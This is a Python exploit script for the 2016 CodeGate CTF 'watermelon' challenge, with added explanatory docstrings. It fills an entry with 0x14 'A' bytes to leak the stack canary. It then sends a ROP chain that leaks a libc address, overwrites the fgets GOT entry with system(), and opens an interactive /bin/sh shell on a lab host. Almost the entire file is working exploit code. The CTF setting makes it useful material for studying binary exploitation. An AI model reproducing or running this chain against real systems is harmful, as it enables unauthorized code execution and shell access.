
2016 CodeGate watermelon exploit

from SunKn0wn import *
 
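# Connection to the challenge service; the extraction dropped the `r =` target and the
# argument comma.  Every helper below (add/view/modify/exit/attack) reads this module-level `r`.
# Host and port are the lab values given in the write-up.
r = remote('192.168.179.135', 1111)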
 
def add(music, artist):
    """Menu option 1: register a new entry with the given music and artist strings.

    Talks to the module-level connection `r`; each prompt is awaited before its reply
    is sent so the script stays in lockstep with the service's menu.
    """
    dialogue = [
        ('select\t|\t\n', '1'),
        ('music\t|\t', music),
        ('artist\t|\t', artist),
    ]
    for prompt, reply in dialogue:
        r.recvuntil(prompt)
        r.sendline(reply)
 
def view():
    """Menu option 2: ask the service to print its stored entries.

    The caller is responsible for reading the output from `r` afterwards.
    """
    menu_prompt = 'select\t|\t\n'
    r.recvuntil(menu_prompt)
    r.sendline('2')
 
def modify(number, music, artist):
    """Menu option 3: overwrite entry `number` with new music and artist strings.

    `number` may be an int; it is sent as its decimal string.  Uses the module-level
    connection `r`.
    """
    steps = (
        ('select\t|\t\n', '3'),
        ('number\t|\t\n', str(number)),
        ('music\t|\t', music),
        ('artist\t|\t', artist),
    )
    for prompt, reply in steps:
        r.recvuntil(prompt)
        r.sendline(reply)
 
def exit():
    """Menu option 4: tell the service to quit and consume its goodbye banner.

    NOTE: this deliberately shadows the builtin exit(); inside this script exit()
    means "send menu option 4", not "terminate the interpreter".  The banner is
    consumed so that whatever the service emits afterwards is the next thing
    `r.recv()` returns.
    """
    choice = '4'
    goodbye = 'BYE\n\n'
    r.recvuntil('select\t|\t\n')
    r.sendline(choice)
    r.recvuntil(goodbye)
 
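def attack():
    """Drive the two-stage exploit described in the write-up against the connection `r`.

    Stage 1 (canary leak): entry 100's artist field is filled with 0x14 'A's and
    view() echoes what follows them; the next 4 bytes are taken as the stack canary.
    The low byte is cleared with `>> 8 << 8` (glibc canaries keep a zero low byte, so
    it is not part of the echoed data).

    Stage 2 (ROP): entry 100 is overwritten again with the leaked canary in place,
    followed by a chain that (1) write()s write's GOT entry to stdout, leaking the
    libc load address, (2) read()s 4 bytes from stdin into fgets's GOT slot, and
    (3) calls fgets(bss) through the now-patched slot.  The original comments say
    this becomes system("/bin/sh"), the name entered at start-up.

    Notes for a reader: every address is a fixed 0x0804xxxx value, i.e. the binary is
    non-PIE, and the two libc offsets are specific to the libc build used in the
    write-up -- recompute them for any other libc.  The GOT overwrite in stage 2 is
    exactly what full RELRO prevents, and the canary leak relies on the service
    echoing a buffer whose contents run up to the canary.

    The extraction had dropped the argument commas in the add()/modify() calls and
    a closing paren in the canary expression; they are restored here.
    """
    fgets_plt = 0x08048520
    write_plt = 0x08048590
    read_plt = 0x080484F0
    fgets_got = 0x0804C018
    write_got = 0x804C034
    pppr = 0x08049ACD      # return target after each 3-argument call; named as a pop/pop/pop/ret -- verify in the binary
    bss = 0x0804D7A0       # presumably where the start-up "name" string lives (see fgets(bss) comment below)

    r.recvuntil('name : ')
    r.sendline('/bin/sh')

    ########## Canary Leak ##########
    print("*** Stage1 ***")
    for _ in range(100):
        add('5unKn0wn', 'pwned')
    # Entry 100's artist field is exactly 0x14 bytes of 'A'; view() prints it back
    # with the bytes that follow it on the stack.
    modify(100, 'SuperHacker', 'A' * 0x14)
    view()
    r.recvuntil('A' * 0x14)
    canary = (up32(r.recv(4)) >> 8) << 8
    print("\n[*] canary : " + hex(canary))

    ########## ROP ##########
    print("\n*** Stage2 ***")
    chain = [
        p32(write_plt), p32(pppr), p32(1), p32(write_got), p32(4),   # write(1, write_got, 4);
        p32(read_plt), p32(pppr), p32(0), p32(fgets_got), p32(4),    # read(0, fgets_got, 4);
        p32(fgets_plt), 'AAAA', p32(bss),                            # fgets(bss); -> system("/bin/sh");
    ]
    payload = ''.join(chain)

    # 0x14 bytes of filler, the canary at its original position, 0xc bytes up to the
    # saved return address, then the chain.
    modify(100, 'SuperHacker', 'A' * 0x14 + p32(canary) + 'A' * 0xc + payload)
    # The helper defined above (menu option 4), not the builtin exit(); presumably the
    # service's function returns here, which is what starts the chain.
    exit()
    write_lib = up32(r.recv(4))
    lib_base = write_lib - 0xDAC50     # write() offset in the write-up's libc
    system_lib = lib_base + 0x40190    # system() offset in the same libc
    print("[*] write_lib : " + hex(write_lib))
    print("[*] lib_base : " + hex(lib_base))
    print("[*] system_lib : " + hex(system_lib))
    sleep(0.2)
    # Consumed by read(0, fgets_got, 4): the first 4 bytes replace fgets's GOT entry.
    r.sendline(p32(system_lib))
    print("\n*** Get Shell ***")
    r.interactive()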
 
# Runs unconditionally at import time; wrap in `if __name__ == "__main__":` if this
# module is ever imported rather than executed directly.
attack()

